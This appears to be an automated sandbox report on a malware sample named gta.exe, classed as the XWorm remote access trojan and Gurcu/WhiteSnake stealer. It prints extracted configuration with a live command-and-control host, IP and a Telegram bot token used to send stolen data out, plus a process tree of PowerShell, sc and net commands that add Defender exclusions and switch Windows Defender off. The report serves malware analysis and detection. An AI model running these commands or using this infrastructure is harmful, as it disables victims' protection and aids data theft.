Analysis
-
max time kernel
268s -
max time network
318s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
29-12-2024 21:06
Errors
General
-
Target
gta.exe
-
Size
256KB
-
MD5
38405cd821fa35824d367aedff252ed2
-
SHA1
b70f9b3de189a89762d31caf11aafad410f2b1bd
-
SHA256
f8ed103574089d431ad8eaac8c8cba0240da701beb8df26011c7c97a6c981182
-
SHA512
c3225c965a817487ec0453a0ed9dd6807983fa3980fc5da2f9d8767fc7cbfa1557d2c0d8754c77be94217a5676737cdf152a64f383cebc2bf9f1198f5b7bd5a3
-
SSDEEP
3072:nOoQq3wNXKk2zg3bQqTJAOJh23R6eBdte1FKNfAc/vnew0sFetD79OzWPEMiZJ:nV+6/zcb9VGfAc/v10sQOzWPEh
Malware Config
Extracted
xworm
5.1
127.0.0.1:37897
global-protective.gl.at.ply.gg:37897:37897
global-protective.gl.at.ply.gg:37897
-
Install_directory
%ProgramData%
-
install_file
nerat.exe
-
telegram
https://api.telegram.org/bot7268785583:AAFvSoXRrVhV7krjc8W8iUc9VL5ZyOqftLY
Extracted
gurcu
https://api.telegram.org/bot7268785583:AAFvSoXRrVhV7krjc8W8iUc9VL5ZyOqftLY/sendMessage?chat_id=@ratnichektg_bot
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
-
Detect Xworm Payload 1 IoCs
-
Gurcu family
-
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Xworm family
-
Boot or Logon Autostart Execution: Active Setup 2 TTPs 5 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Using powershell.exe command.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 2 IoCs
-
Enumerates connected drives 3 TTPs 11 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 1 IoCs
-
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 9 IoCs
-
Kills process with taskkill 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 10 IoCs
-
Modifies data under HKEY_USERS 46 IoCs
-
Modifies registry class 64 IoCs
-
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 10 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\gta.exe"C:\Users\Admin\AppData\Local\Temp\gta.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Drops startup file
- Enumerates connected drives
- Suspicious use of SetThreadContext
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\gta.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'gta.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\nerat.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'nerat.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend2⤵
- Launches sc.exe
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"2⤵
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller2⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 147.185.221.20 37897 <123456789> B029913A1EB6DAE6508F2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data"3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff89f3746f8,0x7ff89f374708,0x7ff89f3747184⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,4531110218932559109,15649668380684118440,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1996 /prefetch:24⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,4531110218932559109,15649668380684118440,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2240 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1992,4531110218932559109,15649668380684118440,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2824 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,4531110218932559109,15649668380684118440,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,4531110218932559109,15649668380684118440,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,4531110218932559109,15649668380684118440,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4748 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,4531110218932559109,15649668380684118440,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1992,4531110218932559109,15649668380684118440,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=3584 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1992,4531110218932559109,15649668380684118440,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=3584 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,4531110218932559109,15649668380684118440,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2008 /prefetch:24⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,4531110218932559109,15649668380684118440,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1980 /prefetch:24⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,4531110218932559109,15649668380684118440,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2320 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,4531110218932559109,15649668380684118440,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1980 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,4531110218932559109,15649668380684118440,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=1996 /prefetch:24⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,4531110218932559109,15649668380684118440,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3688 /prefetch:24⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,4531110218932559109,15649668380684118440,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3936 /prefetch:24⤵
-
-
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM explorer.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Windows\SYSTEM32\shutdown.exeshutdown.exe /f /r /t 02⤵
-
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies Windows Defender Real-time Protection settings
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵
-
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
- Launches sc.exe
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x500 0x49c1⤵
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Suspicious use of SendNotifyMessage
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\explorer.exeexplorer.exe1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
-
C:\Windows\explorer.exeexplorer.exe1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
-
C:\Windows\explorer.exeexplorer.exe1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
-
C:\Windows\explorer.exeexplorer.exe1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
-
C:\Windows\explorer.exeexplorer.exe1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
-
C:\Windows\explorer.exeexplorer.exe1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
-
